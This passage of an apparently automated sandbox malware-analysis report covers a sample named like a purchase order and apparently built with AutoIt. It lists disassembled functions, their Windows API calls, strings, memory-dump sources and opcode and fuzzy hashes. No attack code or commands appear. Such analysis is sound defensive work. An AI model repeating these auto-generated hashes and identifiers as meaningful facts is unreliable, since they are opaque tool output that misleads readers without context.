                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameSend_memmove
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 372448540-1403004172
                                                                    • Opcode ID: a310a2c288e098834ad31ae38b67a3c0b58bc0567b2167e0d219fe2d3f1ac1cf
                                                                    • Instruction ID: 3a2f88e5ee563e8f5f3287355f33d87c7a99400b11e9fff0bf4ea1215b9c0a63
                                                                    • Opcode Fuzzy Hash: a310a2c288e098834ad31ae38b67a3c0b58bc0567b2167e0d219fe2d3f1ac1cf
                                                                    • Instruction Fuzzy Hash: BA0128B5601218ABCB24FBA0CC85DFE7368EF02320B400719F831672D2DE32580CEA50
                                                                    Function 00C78D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: __fread_nolock_memmove
                                                                    • String ID: EA06
                                                                    • API String ID: 1988441806-3962188686
                                                                    • Opcode ID: e6e1ccd73f4708074a2db669f098ac82492b03e7dd4e68e3fd2956eb90b97345
                                                                    • Instruction ID: f2d69e19110ccdf925c653cb8e4716c1782aa7fcad23842436c8c1d4cf4ecfc6
                                                                    • Opcode Fuzzy Hash: e6e1ccd73f4708074a2db669f098ac82492b03e7dd4e68e3fd2956eb90b97345
                                                                    • Instruction Fuzzy Hash: E701F9729042187EDB28CAA8C816EEE7BF8DB11301F00419EF556D2181E874E6089B60
                                                                    Function 00C68CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                      • Part of subcall function 00C6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C6AABC
                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00C68D6B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameSend_memmove
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 372448540-1403004172
                                                                    • Opcode ID: 8736880f1cbdcafa90ac5776b4c6f3816c5af5ec086217a91ae957518d5d1291
                                                                    • Instruction ID: d1c3cac79861d66e432649a892b0b4b4c2be268dd89ce792563775f9393bb427
                                                                    • Opcode Fuzzy Hash: 8736880f1cbdcafa90ac5776b4c6f3816c5af5ec086217a91ae957518d5d1291
                                                                    • Instruction Fuzzy Hash: B101D471A41109ABCF24EBE0C996EFE73A8DF16300F10012AB911772D2DE119E0CFA71
                                                                    Function 00C68D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                      • Part of subcall function 00C6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C6AABC
                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00C68DEE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameSend_memmove
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 372448540-1403004172
                                                                    • Opcode ID: 2e03ceb41bf7dfdb765c466e9375b6d3d86c676fdd6dd3821847b00d9551dc6a
                                                                    • Instruction ID: 964ef9d91e145ee42f12d5a299d549964472eb75aac6a34c4351422e0bfd8173
                                                                    • Opcode Fuzzy Hash: 2e03ceb41bf7dfdb765c466e9375b6d3d86c676fdd6dd3821847b00d9551dc6a
                                                                    • Instruction Fuzzy Hash: 6C01A771A41109ABDB21E6A4C986EFE77ACDF12300F10011AB915732D2DE114E0DF671
                                                                    Function 00C74F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ClassName_wcscmp
                                                                    • String ID: #32770
                                                                    • API String ID: 2292705959-463685578
                                                                    • Opcode ID: 5695fa1a3abf6d2e28225e9d80593614dcfb4aa6c03b8491fa6cebf2fdbb634a
                                                                    • Instruction ID: 93f9b53694ebe5274f6e40ba3adca7a87036a1670cdcbdad79170bb05823a235
                                                                    • Opcode Fuzzy Hash: 5695fa1a3abf6d2e28225e9d80593614dcfb4aa6c03b8491fa6cebf2fdbb634a
                                                                    • Instruction Fuzzy Hash: 5AE0D8326002282BE7209B99EC49FABF7ACEB45B70F00006BFD04D3051EA609B55C7E1
                                                                    Function 00C4B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C4B314: _memset.LIBCMT ref: 00C4B321
                                                                      • Part of subcall function 00C30940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00C4B2F0,?,?,?,00C1100A), ref: 00C30945
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,00C1100A), ref: 00C4B2F4
                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00C1100A), ref: 00C4B303
                                                                    Strings
                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00C4B2FE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                    • API String ID: 3158253471-631824599
                                                                    • Opcode ID: b5b9d1d61d847d2f34d238644ebf3f8632afa69fee6da16ca72ae14a6a3e1fd8
                                                                    • Instruction ID: 866f2ba4c054e58de5f2c0504afd9582c560e53f466e8bb933da12d04d87a10d
                                                                    • Opcode Fuzzy Hash: b5b9d1d61d847d2f34d238644ebf3f8632afa69fee6da16ca72ae14a6a3e1fd8
                                                                    • Instruction Fuzzy Hash: 17E012B02007518FD720DF2AD50878A7BE4BF04755F11897DE496C7661EBF4D845CBA1
                                                                    Function 00C67C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C67C82
                                                                      • Part of subcall function 00C33358: _doexit.LIBCMT ref: 00C33362
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Message_doexit
                                                                    • String ID: AutoIt$Error allocating memory.
                                                                    • API String ID: 1993061046-4017498283
                                                                    • Opcode ID: 0c7c5a77029cf618fa7f739054ed446c31645722454a13072723d68211e1713e
                                                                    • Instruction ID: 7bf24a0598e30fa020494c48de97fe54675f9ed8f27f70f7bbea440d819dab58
                                                                    • Opcode Fuzzy Hash: 0c7c5a77029cf618fa7f739054ed446c31645722454a13072723d68211e1713e
                                                                    • Instruction Fuzzy Hash: 9CD05B323D836C36D21532A5AC07FDE75488F06F57F144436FF14995D349D2859162F5
                                                                    Function 00C51935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSystemDirectoryW.KERNEL32(?), ref: 00C51775
                                                                      • Part of subcall function 00C8BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00C5195E,?), ref: 00C8BFFE
                                                                      • Part of subcall function 00C8BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00C8C010
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00C5196D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                    • String ID: WIN_XPe
                                                                    • API String ID: 582185067-3257408948
                                                                    • Opcode ID: ec6d94e3d147dc5c44a0a74c70481995f6e38134524f2a77f61bdabaddd92ac7
                                                                    • Instruction ID: ea50502af276b9c9604d3f074d60a8b4dade2adcf57bcde30e167674e4f3a1c8
                                                                    • Opcode Fuzzy Hash: ec6d94e3d147dc5c44a0a74c70481995f6e38134524f2a77f61bdabaddd92ac7
                                                                    • Instruction Fuzzy Hash: 3BF0A574801109EBDB15DB95C988BECBBB8AB08346F580096E912A21A1D7758F89DF64
                                                                    Function 00C95998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C959AE
                                                                    • PostMessageW.USER32(00000000), ref: 00C959B5
                                                                      • Part of subcall function 00C75244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C752BC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: FindMessagePostSleepWindow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 529655941-2988720461
                                                                    • Opcode ID: 6b65fcacab57586cf225035fdec61505175f23f40fcf2d16057b7ead80f61c95
                                                                    • Instruction ID: db4f6b5dedf980ed91e5d5cfb0d7543bafb16027f6badaa253d2075a58198b2a
                                                                    • Opcode Fuzzy Hash: 6b65fcacab57586cf225035fdec61505175f23f40fcf2d16057b7ead80f61c95
                                                                    • Instruction Fuzzy Hash: 6DD0C9317843117BE664AB709C0FF9B6614AB04B50F01083AB25AEA1D1C9E0A801C654
                                                                    Function 00C95964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C9596E
                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00C95981
                                                                      • Part of subcall function 00C75244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C752BC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: FindMessagePostSleepWindow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 529655941-2988720461
                                                                    • Opcode ID: 162e213cb0cb084e539feab8cf79eecf43b7d08987e5c8ee55115e5ad8a2601e
                                                                    • Instruction ID: e8a5461aeff9dff259e766cf6a35c8adc37d9ffea9df459187bd9fbaf40035f6
                                                                    • Opcode Fuzzy Hash: 162e213cb0cb084e539feab8cf79eecf43b7d08987e5c8ee55115e5ad8a2601e
                                                                    • Instruction Fuzzy Hash: C1D01231784311B7E664BB70DC0FFDB6A14BF00B50F01083EB35AEA1D1C9E09801C654